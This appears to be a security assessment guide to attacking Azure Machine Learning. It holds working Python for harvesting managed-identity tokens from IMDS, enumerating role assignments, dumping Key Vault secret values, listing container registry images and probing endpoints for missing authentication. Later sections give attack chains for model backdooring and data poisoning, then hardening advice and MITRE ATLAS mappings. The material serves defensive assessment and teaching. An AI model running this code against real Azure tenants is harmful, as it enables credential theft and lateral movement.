Azure ML Attack Surface
Security assessment of Azure Machine Learning -- managed identity exploitation, workspace security, compute instance attacks, and endpoint vulnerabilities.
Azure ML Architecture
Azure Machine Learning organizes resources around workspaces. Each workspace connects to Azure storage, Key Vault, Container Registry, and Application Insights.
Attack Surface Map
| Component | Identity | Storage | Network Exposure |
|---|---|---|---|
| Compute Instances | Managed Identity/User | Workspace storage | VNet optional |
| Online Endpoints | Managed Identity | Model in ACR/Blob | Internet-facing |
| Batch Endpoints | Managed Identity | Blob input/output | VNet optional |
| Datastores | Workspace MI | Blob/ADLS/SQL | Workspace VNet |
| Pipelines | Pipeline MI | Blob artifacts | Workspace VNet |
Attack Techniques
1. Managed Identity Exploitation
Azure ML compute instances are assigned managed identities (system-assigned or user-assigned) that authenticate to Azure services without storing credentials. When these identities are overprivileged -- a common misconfiguration since ML workflows touch many services -- compromising a compute instance grants broad access across the Azure subscription.
The Instance Metadata Service (IMDS) at 169.254.169.254 is the primary token source. Unlike AWS IMDSv2, Azure IMDS does not require a PUT-based token exchange, making credential harvesting straightforward from any code running on the instance.
import requests
# From inside an Azure ML compute instance
# Get token for the managed identity
token_url = "http://169.254.169.254/metadata/identity/oauth2/token"
params = {
"api-version": "2018-02-01",
"resource": "https://management.azure.com/"
}
headers = {"Metadata": "true"}
resp = requests.get(token_url, params=params, headers=headers)
token = resp.json()["access_token"]
# Use the token to enumerate Azure resources
mgmt_url = "https://management.azure.com/subscriptions?api-version=2020-01-01"
subs = requests.get(mgmt_url, headers={"Authorization": f"Bearer {token}"}).json()
for sub in subs.get("value", []):
print(f"Subscription: {sub['displayName']} ({sub['subscriptionId']})")Lateral Movement via Managed Identity
Once you have a token, enumerate what the managed identity can reach. Common overprivilege patterns include Contributor-level access to the resource group (granting access to all sibling resources), Storage Blob Data Contributor on storage accounts containing non-ML data, and Key Vault Secrets Officer across multiple vaults.
import requests
def enumerate_role_assignments(token, subscription_id):
"""Enumerate all role assignments for the current identity."""
url = (
f"https://management.azure.com/subscriptions/{subscription_id}"
f"/providers/Microsoft.Authorization/roleAssignments"
f"?api-version=2022-04-01"
)
headers = {"Authorization": f"Bearer {token}"}
resp = requests.get(url, headers=headers).json()
for assignment in resp.get("value", []):
props = assignment["properties"]
print(f"Role: {props['roleDefinitionId'].split('/')[-1]}")
print(f" Scope: {props['scope']}")
print(f" Principal: {props['principalId']}")
print()
def get_token_for_resource(resource_url):
"""Get a managed identity token scoped to a specific resource."""
resp = requests.get(
"http://169.254.169.254/metadata/identity/oauth2/token",
params={"api-version": "2018-02-01", "resource": resource_url},
headers={"Metadata": "true"}
)
return resp.json()["access_token"]
# Get tokens for different Azure services
mgmt_token = get_token_for_resource("https://management.azure.com/")
storage_token = get_token_for_resource("https://storage.azure.com/")
vault_token = get_token_for_resource("https://vault.azure.net")
graph_token = get_token_for_resource("https://graph.microsoft.com/")2. Workspace Data Store Enumeration
Azure ML workspaces connect to multiple data stores -- Azure Blob Storage, Azure Data Lake Storage (ADLS Gen2), Azure SQL Database, and Azure Database for PostgreSQL. Each datastore registration stores connection details and credentials that can be extracted.
from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential
ml_client = MLClient(
DefaultAzureCredential(),
subscription_id="...",
resource_group_name="...",
workspace_name="..."
)
# List all datastores
for ds in ml_client.datastores.list():
print(f"Datastore: {ds.name} (type: {ds.type})")
if hasattr(ds, 'account_name'):
print(f" Storage: {ds.account_name}/{ds.container_name}")
# List registered models
for model in ml_client.models.list():
print(f"Model: {model.name} v{model.version}")Deep Datastore Inspection
Beyond listing datastores, extract their connection credentials and probe what data is accessible. Datastores that use account keys (rather than managed identity passthrough) store those keys in the workspace's Key Vault.
from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential
ml_client = MLClient(
DefaultAzureCredential(),
subscription_id="...",
resource_group_name="...",
workspace_name="..."
)
# Get detailed datastore info including credential type
for ds in ml_client.datastores.list():
detail = ml_client.datastores.get(ds.name)
print(f"\nDatastore: {detail.name}")
print(f" Type: {detail.type}")
# Check credential type -- account_key vs identity-based
if hasattr(detail, 'credentials'):
cred_type = type(detail.credentials).__name__
print(f" Credential type: {cred_type}")
# For blob datastores, try to list contents
if detail.type == "azure_blob":
from azure.storage.blob import BlobServiceClient
blob_client = BlobServiceClient(
f"https://{detail.account_name}.blob.core.windows.net",
credential=DefaultAzureCredential()
)
container = blob_client.get_container_client(detail.container_name)
print(f" Sample contents:")
for blob in container.list_blobs(results_per_page=5):
print(f" {blob.name} ({blob.size} bytes)")
# Enumerate environments (container images used for training/inference)
for env in ml_client.environments.list():
print(f"Environment: {env.name} v{env.version}")
if hasattr(env, 'image'):
print(f" Image: {env.image}")
# List compute targets -- potential pivot points
for compute in ml_client.compute.list():
print(f"Compute: {compute.name} (type: {compute.type}, state: {compute.state})")3. Endpoint Authentication Testing
Azure ML online endpoints support two authentication modes: key-based (a static API key) and Azure AD token-based. Misconfigurations include endpoints deployed with authentication disabled, keys that are never rotated, or overly broad CORS policies.
import requests
# Test if endpoint requires authentication
endpoint_url = "https://my-endpoint.westus2.inference.ml.azure.com/score"
# Attempt unauthenticated access
resp = requests.post(endpoint_url, json={"data": [[1,2,3]]})
print(f"No auth: {resp.status_code}")
# Attempt with a stolen/guessed key
resp = requests.post(
endpoint_url,
json={"data": [[1,2,3]]},
headers={"Authorization": "Bearer <key>"}
)
print(f"With key: {resp.status_code}")Advanced Endpoint Probing
import requests
import json
def probe_endpoint(endpoint_url, keys=None):
"""Comprehensive endpoint security assessment."""
results = {}
# Test authentication modes
results["no_auth"] = requests.post(
endpoint_url, json={"data": [[1,2,3]]}
).status_code
# Test with OPTIONS to check CORS
results["cors"] = requests.options(endpoint_url).headers.get(
"Access-Control-Allow-Origin", "not set"
)
# Test Swagger/OpenAPI endpoint (often exposed)
swagger_url = endpoint_url.replace("/score", "/swagger.json")
swagger_resp = requests.get(swagger_url)
results["swagger_exposed"] = swagger_resp.status_code == 200
if results["swagger_exposed"]:
results["swagger_paths"] = list(swagger_resp.json().get("paths", {}).keys())
# Test health endpoint
health_url = endpoint_url.replace("/score", "/")
results["health"] = requests.get(health_url).status_code
# Test for verbose error messages (information disclosure)
malformed_resp = requests.post(
endpoint_url,
data="not json",
headers={"Content-Type": "application/json",
"Authorization": f"Bearer {keys[0]}" if keys else ""}
)
results["error_verbosity"] = len(malformed_resp.text)
results["error_sample"] = malformed_resp.text[:500]
return results
# Enumerate all endpoints and probe each
from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential
ml_client = MLClient(
DefaultAzureCredential(),
subscription_id="...",
resource_group_name="...",
workspace_name="..."
)
for endpoint in ml_client.online_endpoints.list():
print(f"\n=== Endpoint: {endpoint.name} ===")
print(f" Auth mode: {endpoint.auth_mode}")
print(f" Scoring URI: {endpoint.scoring_uri}")
# Get endpoint keys if key-based auth
if endpoint.auth_mode == "key":
keys = ml_client.online_endpoints.get_keys(endpoint.name)
print(f" Primary key: {keys.primary_key[:10]}...")
print(f" Secondary key: {keys.secondary_key[:10]}...")4. Key Vault Secret Extraction
Every Azure ML workspace creates an associated Azure Key Vault. This vault stores datastore credentials, API keys, custom secrets set by data scientists, and connection strings. The workspace's managed identity typically has broad access to this vault, making it a high-value target after initial compute compromise.
from azure.keyvault.secrets import SecretClient
from azure.identity import DefaultAzureCredential
# Azure ML workspaces have an associated Key Vault
kv_client = SecretClient(
vault_url="https://my-workspace-kv.vault.azure.net/",
credential=DefaultAzureCredential()
)
# List and read secrets
for secret in kv_client.list_properties_of_secrets():
print(f"Secret: {secret.name}")
value = kv_client.get_secret(secret.name)
print(f" Value: {value.value[:50]}...")Comprehensive Key Vault Enumeration
from azure.keyvault.secrets import SecretClient
from azure.keyvault.keys import KeyClient
from azure.keyvault.certificates import CertificateClient
from azure.identity import DefaultAzureCredential
credential = DefaultAzureCredential()
vault_url = "https://my-workspace-kv.vault.azure.net/"
# Enumerate secrets
secret_client = SecretClient(vault_url=vault_url, credential=credential)
print("=== Secrets ===")
for secret in secret_client.list_properties_of_secrets():
print(f" {secret.name} (enabled: {secret.enabled}, "
f"created: {secret.created_on})")
# Categorize by naming convention
if any(kw in secret.name.lower() for kw in
['connection', 'storage', 'sql', 'password', 'key', 'token']):
print(f" [HIGH VALUE] Likely credential or connection string")
# Enumerate keys (used for encryption, signing)
key_client = KeyClient(vault_url=vault_url, credential=credential)
print("\n=== Keys ===")
for key in key_client.list_properties_of_keys():
print(f" {key.name} (type: {key.key_type}, ops: {key.allowed_operations})")
# Enumerate certificates
cert_client = CertificateClient(vault_url=vault_url, credential=credential)
print("\n=== Certificates ===")
for cert in cert_client.list_properties_of_certificates():
print(f" {cert.name} (expires: {cert.expires_on})")5. Container Registry Exploitation
Azure ML workspaces use Azure Container Registry (ACR) to store Docker images for training and inference environments. Compromising ACR access enables model supply chain attacks -- replacing legitimate inference images with backdoored versions.
import requests
def enumerate_acr(acr_name, token):
"""Enumerate repositories and images in Azure Container Registry."""
acr_url = f"https://{acr_name}.azurecr.io"
headers = {"Authorization": f"Bearer {token}"}
# Get ACR-specific token using managed identity
exchange_url = f"{acr_url}/oauth2/exchange"
acr_token_resp = requests.post(exchange_url, data={
"grant_type": "access_token",
"service": f"{acr_name}.azurecr.io",
"access_token": token
})
acr_token = acr_token_resp.json().get("refresh_token")
# List repositories
repos = requests.get(
f"{acr_url}/v2/_catalog",
headers={"Authorization": f"Bearer {acr_token}"}
).json()
for repo in repos.get("repositories", []):
print(f"Repository: {repo}")
# List tags
tags = requests.get(
f"{acr_url}/v2/{repo}/tags/list",
headers={"Authorization": f"Bearer {acr_token}"}
).json()
for tag in tags.get("tags", [])[:5]:
print(f" Tag: {tag}")
# Get manifest for image analysis
manifest = requests.get(
f"{acr_url}/v2/{repo}/manifests/{tag}",
headers={
"Authorization": f"Bearer {acr_token}",
"Accept": "application/vnd.docker.distribution.manifest.v2+json"
}
).json()
print(f" Layers: {len(manifest.get('layers', []))}")6. Network Isolation Assessment
Azure ML supports VNet integration, but many deployments use the default configuration without network isolation. Even when VNet integration is enabled, misconfigured network security groups (NSGs) and missing private endpoints create attack paths.
import requests
def assess_network_isolation(token, subscription_id, resource_group, workspace_name):
"""Assess whether an Azure ML workspace has proper network isolation."""
base_url = "https://management.azure.com"
headers = {"Authorization": f"Bearer {token}"}
# Get workspace details
ws_url = (
f"{base_url}/subscriptions/{subscription_id}"
f"/resourceGroups/{resource_group}"
f"/providers/Microsoft.MachineLearningServices"
f"/workspaces/{workspace_name}"
f"?api-version=2023-10-01"
)
ws = requests.get(ws_url, headers=headers).json()
props = ws.get("properties", {})
results = {
"public_network_access": props.get("publicNetworkAccess", "Unknown"),
"private_endpoints": [],
"managed_network": props.get("managedNetwork", {}),
}
# Check for private endpoint connections
pe_connections = props.get("privateEndpointConnections", [])
for pe in pe_connections:
pe_props = pe.get("properties", {})
results["private_endpoints"].append({
"name": pe.get("name"),
"status": pe_props.get("privateLinkServiceConnectionState", {}).get("status")
})
# Assess risk
if results["public_network_access"] == "Enabled":
print("[CRITICAL] Public network access is enabled")
if not results["private_endpoints"]:
print("[HIGH] No private endpoints configured")
return resultsDefensive Assessment Checklist
When assessing Azure ML security posture, verify these controls:
| Control Area | What to Check | MITRE ATLAS Reference |
|---|---|---|
| Identity | Managed identity scope, conditional access policies, RBAC assignments | AML.T0003 (ML Model Access) |
| Network | VNet integration, private endpoints, NSG rules, public endpoint exposure | AML.T0002 (Active Scanning) |
| Data | Storage encryption, datastore credential type, blob public access | AML.T0008 (Collection) |
| Compute | Instance isolation, SSH access, idle shutdown, patching | AML.T0004 (Full Model Access) |
| Registry | ACR access controls, image signing, vulnerability scanning | AML.T0018 (Backdoor ML Model) |
| Secrets | Key Vault access policies, secret rotation, soft-delete enabled | AML.TA0008 (Collection) |
| Monitoring | Diagnostic settings, Azure Sentinel integration, audit logs | AML.TA0006 (Defense Evasion) |
Recommended Hardening
- Use user-assigned managed identities with least-privilege RBAC instead of system-assigned identities with broad scope.
- Enable VNet integration with private endpoints for the workspace, storage accounts, Key Vault, and ACR.
- Set
publicNetworkAccessto Disabled on all workspace resources. - Use credential passthrough for datastores instead of storing account keys in Key Vault.
- Enable ACR content trust and scan images for vulnerabilities before deployment.
- Enforce
auth_mode: aad_tokenon endpoints rather than key-based authentication. - Enable Azure Sentinel with the ML workspace diagnostic settings for security monitoring.
- Rotate endpoint keys on a regular schedule and after any suspected compromise.
Common Attack Chains
Real-world Azure ML engagements typically combine multiple techniques. Here are common attack chains ordered by impact:
Chain 1: Compute to Subscription Takeover
1. Initial access via malicious notebook or compromised data scientist credentials
2. Extract managed identity token from IMDS (169.254.169.254)
3. Enumerate role assignments to discover overprivileged identity
4. Access Key Vault secrets (storage keys, API credentials, connection strings)
5. Use storage keys to access blob containers across the subscription
6. Discover secrets in non-ML Key Vaults shared by the managed identity
7. Pivot to databases, APIs, or other services using extracted credentialsChain 2: Model Supply Chain Attack
1. Enumerate ACR repositories via workspace managed identity
2. Identify inference container images used by production endpoints
3. Pull the target image, inject a backdoor (data exfiltration layer)
4. Push the modified image with the same tag (no immutability)
5. Trigger endpoint redeployment (or wait for next scheduled update)
6. Backdoored model now exfiltrates inference data to attacker C2Chain 3: Training Pipeline Manipulation
1. Access workspace via compromised compute instance
2. Enumerate datastores and identify training data locations
3. Modify training data in blob storage to inject backdoor examples
4. Wait for scheduled retraining pipeline to execute
5. Backdoored model is registered in model registry
6. Backdoored model is deployed to production endpointMITRE ATLAS Mapping for Azure ML Attacks
| Attack Technique | ATLAS ID | Azure ML-Specific Context |
|---|---|---|
| IMDS managed identity token extraction | AML.TA0002 (Initial Access) | Workspace MI with broad RBAC scope |
| Datastore enumeration | AML.T0000 (Search for Victim's Data) | Registered datastores reveal all connected storage |
| Endpoint probing | AML.T0002 (Active Scanning) | Endpoints may use key-based auth without rotation |
| Model extraction via endpoint | AML.T0024 (Model Extraction) | Online endpoints serving model predictions |
| ACR image tampering | AML.T0018 (Backdoor ML Model) | Replace training/inference images in ACR |
| Key Vault lateral movement | AML.TA0008 (Collection) | Workspace Key Vault stores cross-service secrets |
| Training data poisoning via blob | AML.T0020 (Data Poisoning) | Modify training data in connected blob storage |
Cross-Platform Comparison
| Attack Vector | Azure ML | AWS SageMaker | GCP Vertex AI |
|---|---|---|---|
| Credential source | IMDS (managed identity) | IMDS (IAM role) | Metadata server (SA token) |
| Primary storage | Blob Storage / ADLS | S3 | GCS |
| Container registry | Azure Container Registry | Amazon ECR | Artifact Registry |
| Secret management | Key Vault (auto-created) | Secrets Manager / SSM | Secret Manager |
| Network isolation | VNet + Private Endpoints | VPC + VPC Endpoints | VPC-SC + Private Google Access |
| Biggest risk | Key Vault cross-service exposure | IAM role overprivilege | Service account Editor role |
Related Topics
- Cloud AI Infrastructure -- Cross-platform overview
- GCP Vertex AI -- GCP comparison
- AWS SageMaker -- AWS comparison
References
- Azure Machine Learning Security Baseline - Microsoft (2024) - Official security configuration guidance
- "Securing Azure Machine Learning Workspaces" - Microsoft Learn (2024) - Workspace isolation and access control
- "Managed Identity Best Practices" - Microsoft (2024) - Guidance on limiting managed identity scope
- "Azure Security Benchmark v3" - Microsoft (2023) - Cross-service security controls applicable to Azure ML
What makes Azure ML's Key Vault integration a significant attack surface?